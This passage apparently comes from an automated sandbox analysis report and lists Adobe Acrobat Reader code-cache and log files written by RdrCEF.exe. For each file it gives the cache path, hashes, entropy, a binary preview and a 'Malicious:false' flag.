                                                                                                        Preview:0\r..m......R....|....._keyhttps://rna-resource.acrobat.com/static/js/plugins/signatures/js/selector.js ..A..Eo...................................*"J.......c}.H7M=M..-.....Ix..R.l...}Rl.$q.A..Eo.......v6.........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\92c56fa2a6c4d5ba_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):227
                                                                                                        Entropy (8bit):5.2475617599410205
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:m+l18t08RzYOCGLvHkWBGKuKjXKeRKVIJ/2oKPWFvGH5kt1llhKJ9lOe28WIJLkU:mY8nYOFLvEWdrROk/Iu0H6tupN16wG0
                                                                                                        MD5:211BF5A96EEB10767B8B3AD983D2DB77
                                                                                                        SHA1:9945327D460D27E329291FD2C5412FB64255E09E
                                                                                                        SHA-256:166E7D895D9814F4A933EF2F0BE5E2F7BA58139EA14E266C7B9CE34823F60464
                                                                                                        SHA-512:4DB5812EBFCFA756E68424CBFD080E41318556D9A75B950858910F4889AE7BDA961590F6F5BC7D6B58F3E63BCE2C2689B7A66C1EFE1370C51FB9C122C1430696
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......_...h......_keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files/js/selector.js ..A..Eo...................................*"J..........%.k.SZ..~W.....:)'B..ad......A..Eo..................

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\946896ee27df7947_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):217
                                                                                                        Entropy (8bit):5.290739627758185
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:m+lstxt08RzYOCGLvHkWBGKuKjXKX+IAuAJVKjXKLuVGH5kt1llhKJXYPmJelc03:mLrnYOFLvEWdrIoJUQNH6tuCeJIi0
                                                                                                        MD5:FC0DFD7505BA77920B1C620B50570408
                                                                                                        SHA1:E3EB14B21CEEA2A8C830E08FB6797D4ECB8E55D7
                                                                                                        SHA-256:4DA4DA6074A45E69AA081D306D5D229CF0538DC00EE94178D374DAEF1D2CC883
                                                                                                        SHA-512:C1A13EC9222951A4826DB45BDFD7981A117E823121E4D7BBD7B8459C4EDFDE6CFE8597447A1C2E1F4B775F16DFFF6D18EDC9B26DA1DBD8B63F4E194D4FFAEC90
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......U..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files-select/js/plugin.js ..A..Eo...................................*"J.........;"./N_.,.:C..2....9L.H...3:...A..Eo..................

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\983b7a3da8f39a46_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):212
                                                                                                        Entropy (8bit):5.166716137442558
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:mOEYOFLvEWdrIhu0H6tmhXpzgm2d/vc5/:0RWawXpRsI
                                                                                                        MD5:18136F4414EBE0259B37E125A31921B1
                                                                                                        SHA1:87FCCE14874D8C753CDB8516FBCB93B8F4524EE3
                                                                                                        SHA-256:515AACD89FC39CAC97682F33B83545B45C86A3FDA4E2D2D300F07B9F96BD055E
                                                                                                        SHA-512:692BA94D9F23B380D498197B9493FCF8679D09F3E8C364229E7718FC95028EA6F76633BD76B10EEA039C5C6F98110F726902A95F6D6182F7B95AAEA518F0E25A
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......P....r......_keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files/js/selector.js ..A..Eo...................................*"J........Z.Z}Q..4.o....0+..[|..n:*..U.W.A..Eo......"..Y........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\aba6710fde0876af_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):192
                                                                                                        Entropy (8bit):5.210159265495963
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:m+l8UElLA8RzYOCGLvHkWBGKuKPK7CvGH5kt1llhIbV2BiaQ562HvpMmON5tt:mAElVYOFLvEW1KBH6t0dx56uvpQ
                                                                                                        MD5:54F8549F4FB660E0380B51BE26E2E08B
                                                                                                        SHA1:E84F83CA5C7D73E0A99FF0E9AEA86287493A1D3D
                                                                                                        SHA-256:C12DB9128E91F8F8B1C7880079051B99349822A1F2A7C45BBB361B8EB207AA7D
                                                                                                        SHA-512:E2E062178604FD179BF831B230D29181A2FDF49110A9E210D8CF652C094ACEDFA9464648776935A5A28466017D7749A31831C20488522D4C129BD4B4E9453C0B
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......<...)6......_keyhttps://rna-resource.acrobat.com/static/js/rna-main.js ..A..Eo...................................*"J........z?...SwC...^..y.....V..7R-O.....A..Eo..................

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\b6d5deb4812ac6e9_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):218
                                                                                                        Entropy (8bit):5.322897470248821
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:mWYOFLvEWdBJvvu0H6t4CUDLYtmOZnu/l:xRBJ9aMDcFZut
                                                                                                        MD5:8D236EBFAA1444397F383A1693E80FDA
                                                                                                        SHA1:E287DBFD186327F43BDB521E4B6ED715777DFC62
                                                                                                        SHA-256:0F97F75F15D1750B0D4E50ACFBAF235152F3A9DE96D47411DDDD1023DFC51106
                                                                                                        SHA-512:D0206038458CAA533A928CFAAD23A9BC244DBED7EC1CC50145D66F1E0AE9B612415DAE1763F5D19BC1D0B6BBFEF9AA02C78DE76C4B511E08012F364D1269D546
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......V.....h....._keyhttps://rna-resource.acrobat.com/static/js/plugins/activity-badge/js/selector.js ..A..Eo...................................*"J...........t.q..W.EZ....1...[.zC.7mD..A..Eo........Y.........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\bba29d2e6197e2f4_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):215
                                                                                                        Entropy (8bit):5.220917921259277
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:m+lxCq//6v8RzYOCGLvHkWBGKuKCH6U4LJzWHK7WFvGH5kt1llh6N/pSKGoSSl03:msRPYOFLvEWIa7zp7VH6tI8VPut
                                                                                                        MD5:17382272FABDA8D6CAE05141E06C6467
                                                                                                        SHA1:C16D0AA5834A0AB200A533996CF11DADE14C005A
                                                                                                        SHA-256:B60FC739261EA029BF84B9B132012A851DAAC0BAB9B57B22EC5C3A4DAC5F0BBB
                                                                                                        SHA-512:9478BA4C1F50516FC345C4517C01EAF923331F4FEE5E1A9D77B9EBFD6140EBE669DF726DDA49B928E2F573CC6726FCC1417FCD79962A98043C25CDEDA0B23AED
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......S...{.j....._keyhttps://rna-resource.acrobat.com/static/js/libs/require/2.1.15/require.min.js ..A..Eo...................................*"J...........L...Im.@.........E.nW...IP..A..Eo......[<e.........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\bf8eae3dcaf681ca_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):213
                                                                                                        Entropy (8bit):5.180457832944006
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:maYt6EYOFLvEWd5Rf29QNH6t2ygmblfqu/lD:sDRH4eaUy7sID
                                                                                                        MD5:B354A55E6784EA651379029C663CE511
                                                                                                        SHA1:2B64C4F7FEE011FD57DAF85E7B1654B5EFE92708
                                                                                                        SHA-256:099C242C4768E526CAF3BB9C442B367D8663D436C2EF6CD19FD53F48BAA5C7DE
                                                                                                        SHA-512:578282D15FCEB608BCC920399B8B89CF40FBDBB26C4FEF2827A0694AD1523B701381FC360B9BEDBDE2BB055F96D75919CE492DCB874E941636BECE31B391F076
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......Q....)il...._keyhttps://rna-resource.acrobat.com/static/js/plugins/oauthdialog/js/plugin.js ..A..Eo...................................*"JV...........xc.6.#....K..1\p..%.!.....i.A..Eo........S........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\c03c0918f3ea6b81_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):192
                                                                                                        Entropy (8bit):5.152231351738553
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:m+l8sldA8RzYOjGLvHkwIEZArCvGH5kt1llh8/vfJNEB2bVqgKSk4K5mn/lt:mQ9YO6LvEwhIH6tQ/oMhKX4t
                                                                                                        MD5:989EAEAD5B8CD058CF8981D38733768F
                                                                                                        SHA1:51EA3B7B350F6E1227A45CA47CB03A5C02659FED
                                                                                                        SHA-256:C83AD4E59020910362BD94B7C1BFE5994D5B9A36A09769143DB3B563A64BAA38
                                                                                                        SHA-512:093CE835F63B7AF75CAB53B6161A51826AE85D08EC9ECA92B9C3DDAAE712879AD30180E184F9ECE5572D167642579F5B7D2918F2F112B8E078C4F844DCDF40BE
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......<....}......_keyhttps://rna-v2-resource.acrobat.com/dc-app-launcher.js ..A..Eo...................................*"J<.......P.6,."Q..\...Nr.>.:x.30.../F.JG.A..Eo........W/........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\cf3e34002cde7e9c_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):212
                                                                                                        Entropy (8bit):5.261025307525973
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:mQt6EYOFLvEWdccAHQNH6tqHzmjBRCh/4u:XRc9eaYHqDi/n
                                                                                                        MD5:10D9D96D535B43C5108EFE73A11394C8
                                                                                                        SHA1:8249FA7527BE8F38615A21CC5D46002257EE8F6A
                                                                                                        SHA-256:91AF6D8CDFAB5C9F30DF579C6FDD74DF654C87AA66934E903FD2382E8B4DC2F3
                                                                                                        SHA-512:B20DCD87712260A743CE4D0A8E4ECB4B6A4FDC8B72BCDD19A3BD2E69866A483ADB62BA89E2BC00A312838E94B58B5F925E26418560A6421FABCF48E8FFB799E0
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......P...W3......_keyhttps://rna-resource.acrobat.com/static/js/plugins/scan-files/js/plugin.js ..A..Eo...................................*"J.......PJm...0x.x..RD...BB!@5..<..]....A..Eo......."t.........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\d5dedf551f4d1592_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):215
                                                                                                        Entropy (8bit):5.205485060000793
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:m+lxrl/08RzYOCGLvHkWBGKuKjXK+RNBzKBtKPWFvGH5kt1llhyMAS4Z4xK6te8r:msrnYOFLvEWd5Rf2Au0H6tOMpKGeN
                                                                                                        MD5:532FF7A199B1C2102519B1A6F5576EBA
                                                                                                        SHA1:24AAC9AA5DFA625C0D3AD48C67A92B05E47EEEF5
                                                                                                        SHA-256:274841A13772E9C165FE78858ED1052411AEB245F031B171F0DCBB4B474F85E9
                                                                                                        SHA-512:AED99AA04B10314889593E2B0B2EDA83F5D60DA953D9A9A03103C75C83048C2D1CB81BCFE60D58600EFCC1DA762B983B35FD9C4D28E21DF566F6C05DA9429046
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......S....c......_keyhttps://rna-resource.acrobat.com/static/js/plugins/oauthdialog/js/selector.js ..A..Eo...................................*"JO................v.:......NH..-.A.C.Et..A..Eo........s0........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\d718cdd8437bf89e_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):221
                                                                                                        Entropy (8bit):5.360443470749278
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:masIYO6LvEwQlRmVd5u0H6twh//yFZJeTXIGb/:oaOQK75u0aqh//weTXIGb
                                                                                                        MD5:688BF0C51595D2FAA84CF7424A28390D
                                                                                                        SHA1:E76504105A1F167969D265F53981A3A31D5CD416
                                                                                                        SHA-256:6820CED98080B5FD2036D3F44CEF5A37BB746955FCBCF1CBEC4D340782256699
                                                                                                        SHA-512:D09BADD2E547EBA5CCAC499BED3B2C94231D000C932A5E0B53E77CACDC3E6937B2A7469076ACE4875837E7E2FA19C7777FA52F9DD4D0B8C54C558D33CAAE05B8
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......Y..........._keyhttps://rna-v2-resource.acrobat.com/dc-desktop-app-dropin/1.0.0_1.0.0/3815-chunk.js ..A..Eo...................................*"J~.......M.a...x...U..4Oo.%k..;.C..m.F.FB.A..Eo.......M?'........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\d742071e43604bc4_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):221
                                                                                                        Entropy (8bit):5.3494380250229
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:m+lzhgv8RzYOjGLvHkwIBIXeRmBVGUku0H5kt1llhr1HkMb6d4144mGt/l:maWEYO6LvEwQlRmVGbu0H6tH3b6dOY
                                                                                                        MD5:83F5B62E4E205725BCD296FC56E985B8
                                                                                                        SHA1:95C6BA744AE92A1282C7A97C636070CC90E94030
                                                                                                        SHA-256:A160C88749C8ED9ED5209BC50C56FC136D0E5064F5EE21F59C635E34AFEFE741
                                                                                                        SHA-512:32F890DA7199A57F368AF3392A82440F94DD17305951732F5FA4B4449D204FF5C3ACB1B22809EC696467358C34AFB2F4E9833B7F18C99EC1D8D281B075C57310
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......Y....`......_keyhttps://rna-v2-resource.acrobat.com/dc-desktop-app-dropin/1.0.0_1.0.0/8950-chunk.js ..A..Eo...................................*"J.............0I. >....I...$\U;........A..Eo.......E>.........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\e58e492b0f04240a_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):214
                                                                                                        Entropy (8bit):5.286153611337
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:maJYOFLvEWdfNBHvdQNH6tCFzwPzPne7cV6gr:v/RfTHleawkPneYU
                                                                                                        MD5:D12D216DF45FA629C8A994604968C3DE
                                                                                                        SHA1:94DDBD45063EFF54BC2E173EA835C4C06FCF3241
                                                                                                        SHA-256:F20F30DC146D921A6C7CF855C88318D1C4E77B30264CCEE48CFFDD61E4B0346A
                                                                                                        SHA-512:C8B942D16D28B18D0E42CD354DFCCD91BE8E745BF0FA42CFBC7BA10D880C453B01EB97C73A9F56222742B953801028FE03D3069AA4AC926F5411257D90026252
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......R..../......_keyhttps://rna-resource.acrobat.com/static/js/plugins/task-handler/js/plugin.js ..A..Eo...................................*"J.......E*).*^.!..C......G..#.&)A..Y..A..Eo......GJx.........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f0cf6dfa8a1afa3d_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):212
                                                                                                        Entropy (8bit):5.221448139952561
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:mkqYOFLvEWd8CAd9QNH6tE/cuuA424r3xll:+RQeaZhrl/
                                                                                                        MD5:4964747D9F7F375305C8A7BAB034D380
                                                                                                        SHA1:EA01CA96317CBB2C2BF5835E9637E2ADE6B93E63
                                                                                                        SHA-256:626671A5656B08E75CCA1BD5BAD14D127C7C678920277AB839F666EF0F768E5C
                                                                                                        SHA-512:F00EA2CE0C94761E192812091E7374E369FBA95C8316B6DDA54AD5CFFE0A2897A76776DE689A112024347221CAFAF100ED355631A3ED567F8D57A17B33C0C44D
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......P...gT....._keyhttps://rna-resource.acrobat.com/static/js/plugins/signatures/js/plugin.js ..A..Eo...................................*"J........#..@..k(v.8g..5.~_....]Pj.*..6.A..Eo......%!..........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f941376b2efdd6e6_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):225
                                                                                                        Entropy (8bit):5.267640121783214
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:m+lFNrs8RzYOCGLvHkWBGKuKjXKeRKVIJ/2kKLuVGH5kt1llhhflsYWmYk5m4g5v:mQZYOFLvEWdrROk/VQNH6tvsLmB4D
                                                                                                        MD5:335B52DF5154604237D059F2EA570D52
                                                                                                        SHA1:E17B9E4D59E0EB58263E94985A279C3738160182
                                                                                                        SHA-256:4BAE392C81DA97BD0FA51D40AC7E61584969D6C1AD081FEA4282BF0E753FCD48
                                                                                                        SHA-512:6B6775059BE4450DCBD26FE08DA7900D5E9442A345591DC2969379B5361B15CB4D570A086E4DC0FF4702520298946E530FFA39B6BC34FC8151C06B69C9A8C53D
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......]......,...._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files/js/plugin.js ..A..Eo...................................*"J........ ./.ev......N~..6.b.....$.j;:C...A..Eo......r..Q........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f971b7eda7fa05c3_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):214
                                                                                                        Entropy (8bit):5.209791740354309
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:m+lUV/la8RzYOCGLvHkWBGKuKjXKjcAW6KPWFvGH5kt1llhopLFrobk9mZa6tokS:mZ/lXYOFLvEWdccAWu0H6tUPdm974d
                                                                                                        MD5:5352F37BA1F7B9C232CBB90E6AE0F6F9
                                                                                                        SHA1:94D5FF8CACCEAF562FD5D2223F167FA45F6E5CEF
                                                                                                        SHA-256:E22BF84F16DF7EB8CC3E40BA38B374FFB273B7F5F2BF4AE84CBFAC460D8EF821
                                                                                                        SHA-512:DC9BEFBA97F3508FCE6C0C3FB866AF72F27AF276D3F7FF4292577B27743DF9C854A970D50D30447777D4210C8DB54FC5D433AAC7D9DD1CC616E745E2F77C6934
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......R...F......._keyhttps://rna-resource.acrobat.com/static/js/plugins/scan-files/js/selector.js ..A..Eo...................................*"J..........U...I.>P...X...x..0U.~;m.x.k.A..Eo.......c3.........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\fd17b2d8331c91e8_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):208
                                                                                                        Entropy (8bit):5.218254337378311
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:m+lUg18RzYOCGLvHkWBGKuKjXKrAUWiKPWFvGH5kt1llh0HztJSB6shoq+NemVv1:mMOYOFLvEWdwAPVu0H6tIHzOB6Jn
                                                                                                        MD5:9DB06344DAF866B5A577E0965B7EAA33
                                                                                                        SHA1:427C87B462A49C9AE6B15C4BFF3CA2BDDDFB4F08
                                                                                                        SHA-256:062B59B122F2D3253373FB0B1F66AF04708FACDC402463FFE08F95C8094F99FD
                                                                                                        SHA-512:22B5BC2D5B5CBF530F1E3A0B187F8F6DF6E442C110D79FF87E589B766C66E534332BD86A17F0C620358A9F0C928E0BF898EA282C17BF911B40731D5AAF729D14
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......L....Ey....._keyhttps://rna-resource.acrobat.com/static/js/plugins/home/js/selector.js ..A..Eo...................................*"JI............k....F..D..O.n;[.1m.....=..A..Eo......|...........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\febb41df4ea2b63a_0

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):232
                                                                                                        Entropy (8bit):5.281175038271157
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:msPYOFLvEWdrROk/RJUQNH6tQzzc3Me/:3RrROk/sea+P
                                                                                                        MD5:3A6036E72255E0CAD2CDB778174FC66E
                                                                                                        SHA1:B6635F8ED454C432DF7B14C197A4B5A54C90F45F
                                                                                                        SHA-256:C1C682723EC754A92A9158E5969A0772CF115D47E84C0F8881BC771C6950E647
                                                                                                        SHA-512:495D5220A6DA3311FCF4660C34DC35E17D547FEC2DD35957CA2D0F6442A0BA3AC5F30F7B1359017DD0880A78D45AFDBB571477EB59DF27EE17D0783785E83F5C
                                                                                                        Malicious:false
                                                                                                        Preview:0\r..m......d...<.s....._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files-select/js/plugin.js ..A..Eo...................................*"J.............9Q].8O.z....=..:.N.{....N{.A..Eo..................

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\temp-index

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1584
                                                                                                        Entropy (8bit):5.222152195726076
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:QeSjv2ywuIfGgMgara8iwhi3c7WUwNIn+VD/ZY+kzV2X0eSjQPnWjBBbI+:QbyRuwN9arWeLavs+Wj0+
                                                                                                        MD5:F4D10C563205D1AA87A0831E648874F7
                                                                                                        SHA1:B7ED43420E2B92F900885B4E6DE3AFD675CB7030
                                                                                                        SHA-256:0D234E36915E831F14D50625412720C40D99E1C3636A7CCD4E637F09E30CCA07
                                                                                                        SHA-512:CCE593957E3503FAF5FC508C34DDA4A4E5FCAAE9C98DF7AC7BD54EB88E155A12CB6AC01C01B9B22D1DDCEBAAE9CEEFC5448502A44FB37260D41CB4C0D92BA593
                                                                                                        Malicious:false
                                                                                                        Preview:(.../.3.oy retne....@...................=....m....i?../.........+.U.!..V..i?../.............D.4...i?../...........*......i?../.........!...0.o..i?../..........+.{..'..i?../..........u\]..q..i?../..........[.i..%...i?../..........o..k....i?../..............q...i?../.........A?.2:....i?../.........?..7X.L..i?../.........=..(Q.x..i?../............=.....i?../............P[. q..i?../.........,+..._.#..i?../...........M.U....i?../..................i?../...........3.....i?../.............k7A...i?../.........:..N.A....i?../.........Gy.'.h...i?../.............o...i?../...........2q......i?../...........*....i?../.........F..=z;...i?../...........P....V..i?../...........;.y~A...i?../..........v...q....i?../..........$..+I...i?../...........9.cmvd..i?../...........a......i?../..............oB*..i?../.........<...W..J..i?../...........6<|.....i?../.........t...$o..@.Z?../..........K`C..B.@.Z?../.........C.M...T@.Z?../...........u.}..5@.Z?../........._oL...@.Z?../.........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\the-real-index (copy)

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1584
                                                                                                        Entropy (8bit):5.222152195726076
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:QeSjv2ywuIfGgMgara8iwhi3c7WUwNIn+VD/ZY+kzV2X0eSjQPnWjBBbI+:QbyRuwN9arWeLavs+Wj0+
                                                                                                        MD5:F4D10C563205D1AA87A0831E648874F7
                                                                                                        SHA1:B7ED43420E2B92F900885B4E6DE3AFD675CB7030
                                                                                                        SHA-256:0D234E36915E831F14D50625412720C40D99E1C3636A7CCD4E637F09E30CCA07
                                                                                                        SHA-512:CCE593957E3503FAF5FC508C34DDA4A4E5FCAAE9C98DF7AC7BD54EB88E155A12CB6AC01C01B9B22D1DDCEBAAE9CEEFC5448502A44FB37260D41CB4C0D92BA593
                                                                                                        Malicious:false
                                                                                                        Preview:(.../.3.oy retne....@...................=....m....i?../.........+.U.!..V..i?../.............D.4...i?../...........*......i?../.........!...0.o..i?../..........+.{..'..i?../..........u\]..q..i?../..........[.i..%...i?../..........o..k....i?../..............q...i?../.........A?.2:....i?../.........?..7X.L..i?../.........=..(Q.x..i?../............=.....i?../............P[. q..i?../.........,+..._.#..i?../...........M.U....i?../..................i?../...........3.....i?../.............k7A...i?../.........:..N.A....i?../.........Gy.'.h...i?../.............o...i?../...........2q......i?../...........*....i?../.........F..=z;...i?../...........P....V..i?../...........;.y~A...i?../..........v...q....i?../..........$..+I...i?../...........9.cmvd..i?../...........a......i?../..............oB*..i?../.........<...W..J..i?../...........6<|.....i?../.........t...$o..@.Z?../..........K`C..B.@.Z?../.........C.M...T@.Z?../...........u.}..5@.Z?../........._oL...@.Z?../.........

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):294
                                                                                                        Entropy (8bit):5.168486857119082
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:H2gVdvAVq2PKJjq2nKuAl9OmbnIFUt8Y2gVJHuAgZmw+Y2gVvAIkwOKJjq2nKuAR:VVevqFHAahFUt8YVpo/+YV75lFHAaSJ
                                                                                                        MD5:832DC3D669BC50AF3CE0F1E44C88BB83
                                                                                                        SHA1:C54A79E04291318FE8F5508B89E3B6FBAACC3312
                                                                                                        SHA-256:1B08E068D33E1215A8570841FCBDD8D7AEF607E39E289913B7EC50BA003E7F78
                                                                                                        SHA-512:20E73983477E1BF5731BDF06EDBCCC9CBBE5B2E7E0D1E7D6CD7A262C8303A01BA7D642EAF66884FE33ECF9E8BBF42A68D04637FF95B1BAB9F01A6B6B320FB197
                                                                                                        Malicious:false
                                                                                                        Preview:2024/11/08-05:10:44.305 22a0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/11/08-05:10:44.306 22a0 Recovering log #3.2024/11/08-05:10:44.307 22a0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
